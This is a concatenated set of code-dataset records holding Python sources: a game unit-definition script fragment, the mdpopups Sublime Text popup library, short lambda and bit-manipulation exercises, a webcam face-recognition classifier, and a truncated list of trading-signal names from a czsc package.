64x64.bmp'\n mutalisk.Image2 = 'Mutalisk2 64x64.bmp'\n mutalisk.Speed = 3.75\n mutalisk.buildTime = 33\n mutalisk.unitHealth = 120\n mutalisk.unitFlying = True\n unitTypeList.append(mutalisk)\n\n corruptor = 
unitType()\n corruptor.attackType = parasiteSpores\n corruptor.Name = \"Corruptor\"\n corruptor.Team = \"Zerg\"\n corruptor.Image1 = 'Corruptor1 64x64.bmp'\n corruptor.Image2 = 'Corruptor2 64x64.bmp'\n corruptor.Speed = 2.9531\n corruptor.buildTime = 40\n corruptor.unitHealth = 200\n corruptor.unitFlying = True\n unitTypeList.append(corruptor)\n \n main(animCounter, unitTypeList, attackTypeList, buildingTypeList)\n","sub_path":"8. AttackTest 2.py","file_name":"8. AttackTest 2.py","file_ext":"py","file_size_in_byte":45145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"274195081","text":"# -*- coding: utf-8 -*-\n\"\"\"\nMarkdown popup.\n\nMarkdown tooltips and phantoms for SublimeText.\n\nTextMate theme to CSS.\n\nhttps://manual.macromates.com/en/language_grammars#naming_conventions\n\"\"\"\nimport sublime\nimport markdown\nimport jinja2\nimport traceback\nimport time\nfrom . import version as ver\nfrom . import colorbox\nfrom collections import OrderedDict\nfrom .st_scheme_template import Scheme2CSS, POPUP, PHANTOM\nfrom .st_clean_css import clean_css\nfrom .st_pygments_highlight import syntax_hl as pyg_syntax_hl\nfrom .st_code_highlight import SublimeHighlight\nfrom .st_mapping import lang_map\nfrom . import imagetint\nimport re\nimport os\ntry:\n import bs4\nexcept Exception:\n bs4 = None\n\nPHANTOM_SUPPORT = int(sublime.version()) >= 3118\nBASE_CSS = 'Packages/mdpopups/css/base.css'\nDEFAULT_CSS = 'Packages/mdpopups/css/default.css'\nDEFAULT_USER_CSS = 'Packages/User/mdpopups.css'\nbase_css = None\nIDK = '''\n\n
¯\_(ツ)_/¯'
\n'''\nHL_SETTING = 'mdpopups.use_sublime_highlighter'\nFORMAT_SETTING = 'mdpopups.default_formatting'\nRE_BAD_ENTITIES = re.compile(r'(&(?!amp;|lt;|gt;|nbsp;)(?:\\w+;|#\\d+;))')\n\nNODEBUG = 0\nERROR = 1\nWARNING = 2\nINFO = 3\n\n\ndef _log(msg):\n \"\"\"Log.\"\"\"\n\n print('mdpopups: %s' % str(msg))\n\n\ndef _debug(msg, level):\n \"\"\"Debug log.\"\"\"\n\n if int(_get_setting('mdpopups.debug', NODEBUG)) >= level:\n _log(msg)\n\n\ndef _get_setting(name, default=None):\n \"\"\"Get the Sublime setting.\"\"\"\n\n return sublime.load_settings('Preferences.sublime-settings').get(name, default)\n\n\ndef _can_show(view, location=-1):\n \"\"\"\n Check if popup can be shown.\n\n I have seen Sublime can sometimes crash if trying\n to do a popup off screen. Normally it should just not show,\n but sometimes it can crash. We will check if popup\n can/should be attempted.\n \"\"\"\n\n can_show = True\n sel = view.sel()\n if location >= 0:\n region = view.visible_region()\n if region.begin() > location or region.end() < location:\n can_show = False\n elif len(sel) >= 1:\n region = view.visible_region()\n if region.begin() > sel[0].b or region.end() < sel[0].b:\n can_show = False\n else:\n can_show = False\n\n return can_show\n\n##############################\n# Theme/Scheme cache management\n##############################\n_scheme_cache = OrderedDict()\n_highlighter_cache = OrderedDict()\n\n\ndef _clear_cache():\n \"\"\"Clear the css cache.\"\"\"\n\n global _scheme_cache\n global _highlighter_cache\n global base_css\n base_css = None\n _scheme_cache = OrderedDict()\n _highlighter_cache = OrderedDict()\n\n\ndef _is_cache_expired(cache_time):\n \"\"\"Check if the cache entry is expired.\"\"\"\n\n delta_time = _get_setting('mdpopups.cache_refresh_time', 30)\n if not isinstance(delta_time, int) or delta_time < 0:\n delta_time = 30\n return delta_time == 0 or (time.time() - cache_time) >= (delta_time * 60)\n\n\ndef _prune_cache():\n \"\"\"Prune older items in cache (related to when they were inserted).\"\"\"\n\n limit = _get_setting('mdpopups.cache_limit', 10)\n if limit is None or not isinstance(limit, int) or limit <= 0:\n limit = 10\n while len(_scheme_cache) >= limit:\n _scheme_cache.popitem(last=True)\n while len(_highlighter_cache) >= limit:\n _highlighter_cache.popitem(last=True)\n\n\ndef _get_sublime_highlighter(view):\n \"\"\"Get the SublimeHighlighter.\"\"\"\n\n scheme = view.settings().get('color_scheme')\n obj = None\n if scheme is not None:\n if scheme in _highlighter_cache:\n obj, t = _highlighter_cache[scheme]\n if _is_cache_expired(t):\n obj = None\n if obj is None:\n try:\n obj = SublimeHighlight(scheme)\n _prune_cache()\n _highlighter_cache[scheme] = (obj, time.time())\n except Exception:\n _log('Failed to get Sublime highlighter object!')\n _debug(traceback.format_exc(), ERROR)\n pass\n return obj\n\n\ndef _get_scheme(view):\n \"\"\"Get the scheme object and user CSS.\"\"\"\n\n scheme = view.settings().get('color_scheme')\n settings = sublime.load_settings(\"Preferences.sublime-settings\")\n obj = None\n user_css = ''\n if scheme is not None:\n if scheme in _scheme_cache:\n obj, user_css, t = _scheme_cache[scheme]\n # Check if cache expired or user changed pygments setting.\n if (\n _is_cache_expired(t) or\n obj.variables.get('use_pygments', True) != (not settings.get(HL_SETTING, False)) or\n obj.variables.get('default_formatting', True) != settings.get(FORMAT_SETTING, True)\n ):\n obj = None\n user_css = ''\n if obj is None:\n try:\n obj = Scheme2CSS(scheme)\n _prune_cache()\n user_css = 
_get_user_css()\n _scheme_cache[scheme] = (obj, user_css, time.time())\n except Exception:\n _log('Failed to convert/retrieve scheme to CSS!')\n _debug(traceback.format_exc(), ERROR)\n return obj, user_css\n\n\ndef _get_user_css():\n \"\"\"Get user css.\"\"\"\n\n css = None\n\n user_css = _get_setting('mdpopups.user_css', DEFAULT_USER_CSS)\n try:\n css = clean_css(sublime.load_resource(user_css))\n except Exception:\n css = clean_css(sublime.load_resource(DEFAULT_CSS))\n return css if css else ''\n\n\n##############################\n# Markdown parsing\n##############################\nclass _MdWrapper(markdown.Markdown):\n \"\"\"\n Wrapper around Python Markdown's class.\n\n This allows us to gracefully continue when a module doesn't load.\n \"\"\"\n\n Meta = {}\n\n def __init__(self, *args, **kwargs):\n \"\"\"Call original init.\"\"\"\n\n super(_MdWrapper, self).__init__(*args, **kwargs)\n\n def registerExtensions(self, extensions, configs): # noqa\n \"\"\"\n Register extensions with this instance of Markdown.\n\n Keyword arguments:\n\n * extensions: A list of extensions, which can either\n be strings or objects. See the docstring on Markdown.\n * configs: A dictionary mapping module names to config options.\n\n \"\"\"\n\n from markdown import util\n from markdown.extensions import Extension\n\n for ext in extensions:\n try:\n if isinstance(ext, util.string_type):\n ext = self.build_extension(ext, configs.get(ext, {}))\n if isinstance(ext, Extension):\n ext.extendMarkdown(self, globals())\n elif ext is not None:\n raise TypeError(\n 'Extension \"%s.%s\" must be of type: \"markdown.Extension\"'\n % (ext.__class__.__module__, ext.__class__.__name__)\n )\n except Exception:\n # We want to gracefully continue even if an extension fails.\n _log('Failed to load markdown module!')\n _debug(traceback.format_exc(), ERROR)\n\n return self\n\n\ndef _get_theme(view, css=None, css_type=POPUP, template_vars=None):\n \"\"\"Get the theme.\"\"\"\n\n global base_css\n if base_css is None:\n base_css = clean_css(sublime.load_resource(BASE_CSS))\n obj, user_css = _get_scheme(view)\n font_size = view.settings().get('font_size', 12)\n try:\n return obj.apply_template(\n base_css +\n obj.get_css() +\n (clean_css(css) if css else '') +\n user_css,\n css_type,\n font_size,\n template_vars\n ) if obj is not None else ''\n except Exception:\n _log('Failed to retrieve scheme CSS!')\n _debug(traceback.format_exc(), ERROR)\n return ''\n\n\ndef _remove_entities(text):\n \"\"\"Remove unsupported HTML entities.\"\"\"\n\n import html.parser\n html = html.parser.HTMLParser()\n\n def repl(m):\n \"\"\"Replace entites except &, <, >, and nbsp.\"\"\"\n return html.unescape(m.group(1))\n\n return RE_BAD_ENTITIES.sub(repl, text)\n\n\ndef _create_html(\n view, content, md=True, css=None, debug=False, css_type=POPUP,\n wrapper_class=None, template_vars=None, template_env_options=None, nl2br=True\n):\n \"\"\"Create html from content.\"\"\"\n\n debug = _get_setting('mdpopups.debug', NODEBUG)\n\n if css is None or not isinstance(css, str):\n css = ''\n\n style = _get_theme(view, css, css_type, template_vars)\n\n if debug:\n _debug('=====CSS=====', INFO)\n _debug(style, INFO)\n\n if md:\n content = md2html(\n view, content, template_vars=template_vars,\n template_env_options=template_env_options, nl2br=nl2br\n )\n else:\n content = _markup_template(content, template_vars, template_env_options)\n\n if debug:\n _debug('=====HTML OUTPUT=====', INFO)\n if bs4:\n soup = bs4.BeautifulSoup(content, \"html.parser\")\n _debug('\\n' + 
soup.prettify(), INFO)\n else:\n _debug('\\n' + content, INFO)\n\n if wrapper_class:\n wrapper = ('
<div class=\"%s\">' % wrapper_class) + '%s</div>'\n    else:\n        wrapper = '<div>%s</div>
'\n\n    html = \"<style>%s</style>\" % (style)\n    html += _remove_entities(wrapper % content)\n    return html\n\n\ndef _markup_template(markup, variables, options):\n    \"\"\"Template for markup.\"\"\"\n\n    if variables:\n        if options is None:\n            options = {}\n        env = jinja2.Environment(**options)\n        return env.from_string(markup).render(plugin=variables)\n    return markup\n\n\n##############################\n# Public functions\n##############################\ndef version():\n    \"\"\"Get the current version.\"\"\"\n\n    return ver.version()\n\n\ndef md2html(view, markup, template_vars=None, template_env_options=None, nl2br=True):\n    \"\"\"Convert Markdown to HTML.\"\"\"\n\n    if _get_setting('mdpopups.use_sublime_highlighter'):\n        sublime_hl = (True, _get_sublime_highlighter(view))\n    else:\n        sublime_hl = (False, None)\n\n    extensions = [\n        \"markdown.extensions.attr_list\",\n        \"markdown.extensions.codehilite\",\n        \"mdpopups.mdx.superfences\",\n        \"mdpopups.mdx.betterem\",\n        \"mdpopups.mdx.magiclink\",\n        \"mdpopups.mdx.inlinehilite\",\n        \"mdpopups.mdx.extrarawhtml\",\n        \"markdown.extensions.admonition\",\n        \"markdown.extensions.def_list\"\n    ]\n\n    if nl2br:\n        extensions.append('markdown.extensions.nl2br')\n\n    configs = {\n        \"mdpopups.mdx.inlinehilite\": {\n            \"style_plain_text\": True,\n            \"css_class\": \"inline-highlight\",\n            \"use_codehilite_settings\": False,\n            \"guess_lang\": False,\n            \"sublime_hl\": sublime_hl\n        },\n        \"markdown.extensions.codehilite\": {\n            \"guess_lang\": False,\n            \"css_class\": \"highlight\"\n        },\n        \"mdpopups.mdx.superfences\": {\n            \"uml_flow\": False,\n            \"uml_sequence\": False,\n            \"sublime_hl\": sublime_hl\n        }\n    }\n\n    return _MdWrapper(\n        extensions=extensions,\n        extension_configs=configs\n    ).convert(_markup_template(markup, template_vars, template_env_options)).replace('&quot;', '\"').replace('\n', '')\n\n\ndef color_box(\n    colors, border=\"#000000ff\", border2=None, height=32, width=32,\n    border_size=1, check_size=4, max_colors=5, alpha=False, border_map=0xF\n):\n    \"\"\"Color box.\"\"\"\n\n    return colorbox.color_box(\n        colors, border, border2, height, width,\n        border_size, check_size, max_colors, alpha, border_map\n    )\n\n\ndef color_box_raw(\n    colors, border=\"#000000ff\", border2=None, height=32, width=32,\n    border_size=1, check_size=4, max_colors=5, alpha=False, border_map=0xF\n):\n    \"\"\"Color box raw.\"\"\"\n\n    return colorbox.color_box_raw(\n        colors, border, border2, height, width,\n        border_size, check_size, max_colors, alpha, border_map\n    )\n\n\ndef tint(img, color, opacity=255, height=None, width=None):\n    \"\"\"Tint the image.\"\"\"\n\n    if isinstance(img, str):\n        try:\n            img = sublime.load_binary_resource(img)\n        except Exception:\n            _log('Could not open binary file!')\n            _debug(traceback.format_exc(), ERROR)\n            return ''\n    return imagetint.tint(img, color, opacity, height, width)\n\n\ndef tint_raw(img, color, opacity=255):\n    \"\"\"Tint the image.\"\"\"\n\n    if isinstance(img, str):\n        try:\n            img = sublime.load_binary_resource(img)\n        except Exception:\n            _log('Could not open binary file!')\n            _debug(traceback.format_exc(), ERROR)\n            return ''\n    return imagetint.tint_raw(img, color, opacity)\n\n\ndef get_language_from_view(view):\n    \"\"\"Guess current language from view.\"\"\"\n\n    lang = None\n    user_map = sublime.load_settings('Preferences.sublime-settings').get('mdpopups.sublime_user_lang_map', {})\n    syntax = os.path.splitext(view.settings().get('syntax').replace('Packages/', '', 1))[0]\n    keys = set(list(lang_map.keys()) + list(user_map.keys()))\n    for key in keys:\n        v1 = lang_map.get(key, (tuple(), tuple()))[1]\n        
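# a syntax may be registered in the built-in map, the user map, or both\n        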
v2 = user_map.get(key, (tuple(), tuple()))[1]\n if syntax in (tuple(v2) + v1):\n lang = key\n break\n return lang\n\n\ndef syntax_highlight(view, src, language=None, inline=False):\n \"\"\"Syntax highlighting for code.\"\"\"\n\n try:\n if _get_setting('mdpopups.use_sublime_highlighter'):\n highlighter = _get_sublime_highlighter(view)\n code = highlighter.syntax_highlight(src, language, inline=inline)\n else:\n code = pyg_syntax_hl(src, language, inline=inline)\n except Exception:\n code = src\n _log('Failed to highlight code!')\n _debug(traceback.format_exc(), ERROR)\n\n return code\n\n\ndef scope2style(view, scope, selected=False, explicit_background=False):\n \"\"\"Convert the scope to a style.\"\"\"\n\n style = {\n 'color': None,\n 'background': None,\n 'style': ''\n }\n obj = _get_scheme(view)[0]\n style_obj = obj.guess_style(scope, selected, explicit_background)\n style['color'] = style_obj.fg_simulated\n style['background'] = style_obj.bg_simulated\n style['style'] = style_obj.style\n return style\n\n\ndef clear_cache():\n \"\"\"Clear cache.\"\"\"\n\n _clear_cache()\n\n\ndef hide_popup(view):\n \"\"\"Hide the popup.\"\"\"\n\n view.hide_popup()\n\n\ndef update_popup(\n view, content, md=True, css=None, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=True\n):\n \"\"\"Update the popup.\"\"\"\n\n disabled = _get_setting('mdpopups.disable', False)\n if disabled:\n _debug('Popups disabled', WARNING)\n return\n\n try:\n html = _create_html(\n view, content, md, css, css_type=POPUP, wrapper_class=wrapper_class,\n template_vars=template_vars, template_env_options=template_env_options, nl2br=nl2br\n )\n except Exception:\n _log(traceback.format_exc())\n html = IDK\n\n view.update_popup(html)\n\n\ndef show_popup(\n view, content, md=True, css=None,\n flags=0, location=-1, max_width=320, max_height=240,\n on_navigate=None, on_hide=None, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=True\n):\n \"\"\"Parse the color scheme if needed and show the styled pop-up.\"\"\"\n\n disabled = _get_setting('mdpopups.disable', False)\n if disabled:\n _debug('Popups disabled', WARNING)\n return\n\n if not _can_show(view, location):\n return\n\n try:\n html = _create_html(\n view, content, md, css, css_type=POPUP, wrapper_class=wrapper_class,\n template_vars=template_vars, template_env_options=template_env_options,\n nl2br=nl2br\n )\n except Exception:\n _log(traceback.format_exc())\n html = IDK\n\n view.show_popup(\n html, flags=flags, location=location, max_width=max_width,\n max_height=max_height, on_navigate=on_navigate, on_hide=on_hide\n )\n\n\ndef is_popup_visible(view):\n \"\"\"Check if popup is visible.\"\"\"\n\n return view.is_popup_visible()\n\n\nif PHANTOM_SUPPORT:\n def add_phantom(\n view, key, region, content, layout, md=True,\n css=None, on_navigate=None, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=True\n ):\n \"\"\"Add a phantom and return phantom id.\"\"\"\n\n disabled = _get_setting('mdpopups.disable', False)\n if disabled:\n _debug('Phantoms disabled', WARNING)\n return\n\n try:\n html = _create_html(\n view, content, md, css, css_type=PHANTOM, wrapper_class=wrapper_class,\n template_vars=template_vars, template_env_options=template_env_options,\n nl2br=nl2br\n )\n except Exception:\n _log(traceback.format_exc())\n html = IDK\n\n return view.add_phantom(key, region, html, layout, on_navigate)\n\n def erase_phantoms(view, key):\n \"\"\"Erase phantoms.\"\"\"\n\n view.erase_phantoms(key)\n\n def 
erase_phantom_by_id(view, pid):\n \"\"\"Erase phantom by ID.\"\"\"\n\n view.erase_phantom_by_id(pid)\n\n def query_phantom(view, pid):\n \"\"\"Query phantom.\"\"\"\n\n return view.query_phantom(pid)\n\n def query_phantoms(view, pids):\n \"\"\"Query phantoms.\"\"\"\n\n return view.query_phantoms(pids)\n\n class Phantom(sublime.Phantom):\n \"\"\"A phantom object.\"\"\"\n\n def __init__(\n self, region, content, layout, md=True,\n css=None, on_navigate=None, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=True\n ):\n \"\"\"Initialize.\"\"\"\n\n super().__init__(region, content, layout, on_navigate)\n self.md = md\n self.css = css\n self.wrapper_class = wrapper_class\n self.template_vars = template_vars\n self.template_env_options = template_env_options\n self.nl2br = nl2br\n\n def __eq__(self, rhs):\n \"\"\"Check if phantoms are equal.\"\"\"\n\n # Note that self.id is not considered\n return (\n self.region == rhs.region and self.content == rhs.content and\n self.layout == rhs.layout and self.on_navigate == rhs.on_navigate and\n self.md == rhs.md and self.css == rhs.css and self.nl2br == rhs.nl2br and\n self.wrapper_class == rhs.wrapper_class and self.template_vars == rhs.template_vars and\n self.template_env_options == rhs.template_env_options\n )\n\n class PhantomSet(sublime.PhantomSet):\n \"\"\"Object that allows easy updating of phantoms.\"\"\"\n\n def __init__(self, view, key=\"\"):\n \"\"\"Initialize.\"\"\"\n\n super().__init__(view, key)\n\n def __del__(self):\n \"\"\"Delete phantoms.\"\"\"\n\n for p in self.phantoms:\n erase_phantom_by_id(self.view, p.id)\n\n def update(self, new_phantoms):\n \"\"\"Update the list of phantoms that exist in the text buffer with their current location.\"\"\"\n\n regions = query_phantoms(self.view, [p.id for p in self.phantoms])\n for i in range(len(regions)):\n self.phantoms[i].region = regions[i]\n\n count = 0\n for p in new_phantoms:\n if not isinstance(p, Phantom):\n # Convert sublime.Phantom to mdpopups.Phantom\n p = Phantom(\n p.region, p.content, p.layout,\n md=False, css=None, on_navigate=p.on_navigate, wrapper_class=None,\n template_vars=None, template_env_options=None, nl2br=False\n )\n new_phantoms[count] = p\n try:\n # Phantom already exists, copy the id from the current one\n idx = self.phantoms.index(p)\n p.id = self.phantoms[idx].id\n except ValueError:\n p.id = add_phantom(\n self.view,\n self.key,\n p.region,\n p.content,\n p.layout,\n p.md,\n p.css,\n p.on_navigate,\n p.wrapper_class,\n p.template_vars,\n p.template_env_options,\n p.nl2br\n )\n count += 1\n\n for p in self.phantoms:\n # if the region is -1, then it's already been deleted, no need to call erase\n if p not in new_phantoms and p.region != sublime.Region(-1):\n erase_phantom_by_id(self.view, p.id)\n\n self.phantoms = new_phantoms\n","sub_path":"Data/Packages/mdpopups/st3/mdpopups/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":20908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"501158749","text":"'''\n5.Write a Python program to square and cube every number\nin a given list of integers using Lambda.\n'''\n\nList=list(map(int,input(\"Enter list elements:\").strip().split()))\n\nsquare = list(map(lambda x : x**2,List))\nprint(square)\ncube = list(map(lambda x : 
x**3,List))\nprint(cube)","sub_path":"Python_Day8/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"449680522","text":"from sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle as pkl\nimport numpy as np\nimport cv2\nfrom embedding import EmbedderGenerator\nfrom termcolor import colored\n\n\nclass Classify():\n\n def __init__(self, classifier='svm'):\n if classifier == \"knn\":\n self.classifier = KNeighborsClassifier(n_neighbors=4)\n self.classifier_name = classifier\n elif classifier == 'svm':\n self.classifier = SVC(C=1.0, kernel=\"linear\", probability=True)\n self.classifier_name = classifier\n elif classifier == 'centroid':\n self.classifier = classifier\n\n def train(self, data):\n names = []\n embeddings = []\n for key in data:\n for embedding in data[key].T:\n print(embedding.shape)\n embeddings.append(embedding)\n names.append(key)\n\n self.le = LabelEncoder()\n labels = self.le.fit_transform(names)\n print(labels)\n self.classifier.fit(embeddings, labels)\n\n self.save()\n\n print(\"Training Done\")\n\n def eval(self, data, test_embedding):\n if self.classifier == 'centroid':\n names = list(data.keys())\n prob = []\n for name in names:\n centroid = np.mean(data[name], axis=-1)\n dist = np.linalg.norm((test_embedding - centroid), 2)\n prob.append(1 - (1/(1+np.exp(-dist))))\n\n prob = np.array(prob)\n idx = np.argmax(prob)\n print(prob)\n print(idx)\n print(names)\n return names[idx]\n\n elif self.classifier_name == 'svm':\n try:\n classifier = pkl.load(open(\"./pickle/classifier\", \"rb\"))\n label_encoder = pkl.load(open(\"./pickle/label_encoder\", \"rb\"))\n except:\n print(f\"{colored('[Error]', 'red')} Could not load model\")\n print(\"exiting\")\n exit(0)\n\n preds = classifier.predict_proba([test_embedding])[0]\n idx = np.argmax(preds)\n proba = preds[idx]\n name = label_encoder.classes_[idx]\n return name\n\n def save(self):\n f = open(\"./pickle/classifier\", \"wb\")\n pkl.dump(self.classifier, f)\n f.close()\n\n f = open(\"./pickle/label_encoder\", \"wb\")\n pkl.dump(self.le, f)\n f.close()\n\n\nif __name__ == \"__main__\":\n\n import os\n try:\n data = pkl.load(open(\"./pickle/data\", \"rb\"))\n except:\n print(\"Error loading file\")\n exit(0)\n\n # path = \"./dataset/test/20190718_094418.jpg\"\n # classify = Classify()\n # if not (os.path.isfile(\"classifier\")):\n # classify.train(data)\n # else:\n # embedder = EmbedderGenerator()\n # embedding = embedder.predict(cv2.imread(path))\n # print(embedding.shape)\n # print(f\"This is {classify.eval(None, embedding)}\")\n\n cap = cv2.VideoCapture(0)\n while True:\n grabbed, frame = cap.read()\n\n if not grabbed:\n print(f\"{colored('[Info]', 'blue')} Exiting\")\n exit(0)\n\n classifier = Classify()\n if not os.path.isfile(\"classifier\"):\n classifier.train(data)\n else:\n embedder = EmbedderGenerator()\n embedding = embedder.predict(frame)\n print(f\"This is {classify.eval(none, embedding)}\")\n cv2.imshow(\"Frame\", frame)\n if cv2.waitKey(1) & 0xFF:\n print(f\"{colored('[Info]', 'blue')} Exiting\")\n exit(0)\n","sub_path":"Face/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"32396805","text":"for _ in range(int(input())):\n n = 
int(input())\n flag=1\n while(n):\n if(n&1 and (n>>1)&1):\n flag=0\n break\n else:\n n>>=1\n if flag:\n print(\"1\")\n else:\n print(\"0\") ","sub_path":"dsa/bit magic/number_is_sparse_or_not.py","file_name":"number_is_sparse_or_not.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"513450084","text":"# coding: utf-8\n\nfrom .analyze import CZSC\nfrom .factors import CzscFactors\nfrom .utils.ta import SMA, EMA, MACD, KDJ\n\n__version__ = \"0.6.8\"\n__author__ = \"zengbin93\"\n__email__ = \"zeng_bin8888@163.com\"\n\ndef get_s_names():\n \"\"\"获取所有信号和因子的名称\"\"\"\n assert __version__ == '0.6.8'\n s_name = [\n '1分钟_倒1方向',\n '1分钟_倒1长度',\n '1分钟_倒1涨跌幅',\n '1分钟_倒1拟合优度',\n '1分钟_倒1近五笔最高点',\n '1分钟_倒1近五笔最低点',\n '1分钟_倒1近七笔最高点',\n '1分钟_倒1近七笔最低点',\n '1分钟_倒1近九笔最高点',\n '1分钟_倒1近九笔最低点',\n '1分钟_倒1近十一笔最高点',\n '1分钟_倒1近十一笔最低点',\n '1分钟_倒1近十三笔最高点',\n '1分钟_倒1近十三笔最低点',\n '1分钟_倒1近十五笔最高点',\n '1分钟_倒1近十五笔最低点',\n '1分钟_倒2方向',\n '1分钟_倒2长度',\n '1分钟_倒2涨跌幅',\n '1分钟_倒2拟合优度',\n '1分钟_倒3方向',\n '1分钟_倒3长度',\n '1分钟_倒3涨跌幅',\n '1分钟_倒3拟合优度',\n '1分钟_倒4方向',\n '1分钟_倒4长度',\n '1分钟_倒4涨跌幅',\n '1分钟_倒4拟合优度',\n '1分钟_倒5方向',\n '1分钟_倒5长度',\n '1分钟_倒5涨跌幅',\n '1分钟_倒5拟合优度',\n '1分钟_倒1五笔',\n '1分钟_倒2五笔',\n '1分钟_倒3五笔',\n '1分钟_倒4五笔',\n '1分钟_倒5五笔',\n '1分钟_倒1七笔',\n '1分钟_倒2七笔',\n '1分钟_倒3七笔',\n '1分钟_倒4七笔',\n '1分钟_倒5七笔',\n '1分钟_倒1九笔',\n '1分钟_倒2九笔',\n '1分钟_倒3九笔',\n '1分钟_倒4九笔',\n '1分钟_倒5九笔',\n '5分钟_倒1方向',\n '5分钟_倒1长度',\n '5分钟_倒1涨跌幅',\n '5分钟_倒1拟合优度',\n '5分钟_倒1近五笔最高点',\n '5分钟_倒1近五笔最低点',\n '5分钟_倒1近七笔最高点',\n '5分钟_倒1近七笔最低点',\n '5分钟_倒1近九笔最高点',\n '5分钟_倒1近九笔最低点',\n '5分钟_倒1近十一笔最高点',\n '5分钟_倒1近十一笔最低点',\n '5分钟_倒1近十三笔最高点',\n '5分钟_倒1近十三笔最低点',\n '5分钟_倒1近十五笔最高点',\n '5分钟_倒1近十五笔最低点',\n '5分钟_倒2方向',\n '5分钟_倒2长度',\n '5分钟_倒2涨跌幅',\n '5分钟_倒2拟合优度',\n '5分钟_倒3方向',\n '5分钟_倒3长度',\n '5分钟_倒3涨跌幅',\n '5分钟_倒3拟合优度',\n '5分钟_倒4方向',\n '5分钟_倒4长度',\n '5分钟_倒4涨跌幅',\n '5分钟_倒4拟合优度',\n '5分钟_倒5方向',\n '5分钟_倒5长度',\n '5分钟_倒5涨跌幅',\n '5分钟_倒5拟合优度',\n '5分钟_倒1五笔',\n '5分钟_倒2五笔',\n '5分钟_倒3五笔',\n '5分钟_倒4五笔',\n '5分钟_倒5五笔',\n '5分钟_倒1七笔',\n '5分钟_倒2七笔',\n '5分钟_倒3七笔',\n '5分钟_倒4七笔',\n '5分钟_倒5七笔',\n '5分钟_倒1九笔',\n '5分钟_倒2九笔',\n '5分钟_倒3九笔',\n '5分钟_倒4九笔',\n '5分钟_倒5九笔',\n '15分钟_倒1方向',\n '15分钟_倒1长度',\n '15分钟_倒1涨跌幅',\n '15分钟_倒1拟合优度',\n '15分钟_倒1近五笔最高点',\n '15分钟_倒1近五笔最低点',\n '15分钟_倒1近七笔最高点',\n '15分钟_倒1近七笔最低点',\n '15分钟_倒1近九笔最高点',\n '15分钟_倒1近九笔最低点',\n '15分钟_倒1近十一笔最高点',\n '15分钟_倒1近十一笔最低点',\n '15分钟_倒1近十三笔最高点',\n '15分钟_倒1近十三笔最低点',\n '15分钟_倒1近十五笔最高点',\n '15分钟_倒1近十五笔最低点',\n '15分钟_倒2方向',\n '15分钟_倒2长度',\n '15分钟_倒2涨跌幅',\n '15分钟_倒2拟合优度',\n '15分钟_倒3方向',\n '15分钟_倒3长度',\n '15分钟_倒3涨跌幅',\n '15分钟_倒3拟合优度',\n '15分钟_倒4方向',\n '15分钟_倒4长度',\n '15分钟_倒4涨跌幅',\n '15分钟_倒4拟合优度',\n '15分钟_倒5方向',\n '15分钟_倒5长度',\n '15分钟_倒5涨跌幅',\n '15分钟_倒5拟合优度',\n '15分钟_倒1五笔',\n '15分钟_倒2五笔',\n '15分钟_倒3五笔',\n '15分钟_倒4五笔',\n '15分钟_倒5五笔',\n '15分钟_倒1七笔',\n '15分钟_倒2七笔',\n '15分钟_倒3七笔',\n '15分钟_倒4七笔',\n '15分钟_倒5七笔',\n '15分钟_倒1九笔',\n '15分钟_倒2九笔',\n '15分钟_倒3九笔',\n '15分钟_倒4九笔',\n '15分钟_倒5九笔',\n '30分钟_倒1方向',\n '30分钟_倒1长度',\n '30分钟_倒1涨跌幅',\n '30分钟_倒1拟合优度',\n '30分钟_倒1近五笔最高点',\n '30分钟_倒1近五笔最低点',\n '30分钟_倒1近七笔最高点',\n '30分钟_倒1近七笔最低点',\n '30分钟_倒1近九笔最高点',\n '30分钟_倒1近九笔最低点',\n '30分钟_倒1近十一笔最高点',\n '30分钟_倒1近十一笔最低点',\n '30分钟_倒1近十三笔最高点',\n '30分钟_倒1近十三笔最低点',\n '30分钟_倒1近十五笔最高点',\n '30分钟_倒1近十五笔最低点',\n '30分钟_倒2方向',\n '30分钟_倒2长度',\n '30分钟_倒2涨跌幅',\n '30分钟_倒2拟合优度',\n '30分钟_倒3方向',\n '30分钟_倒3长度',\n '30分钟_倒3涨跌幅',\n '30分钟_倒3拟合优度',\n '30分钟_倒4方向',\n '30分钟_倒4长度',\n '30分钟_倒4涨跌幅',\n '30分钟_倒4拟合优度',\n '30分钟_倒5方向',\n '30分钟_倒5长度',\n '30分钟_倒5涨跌幅',\n '30分钟_倒5拟合优度',\n '30分钟_倒1五笔',\n '30分钟_倒2五笔',\n '30分钟_倒3五笔',\n '30分钟_倒4五笔',\n 
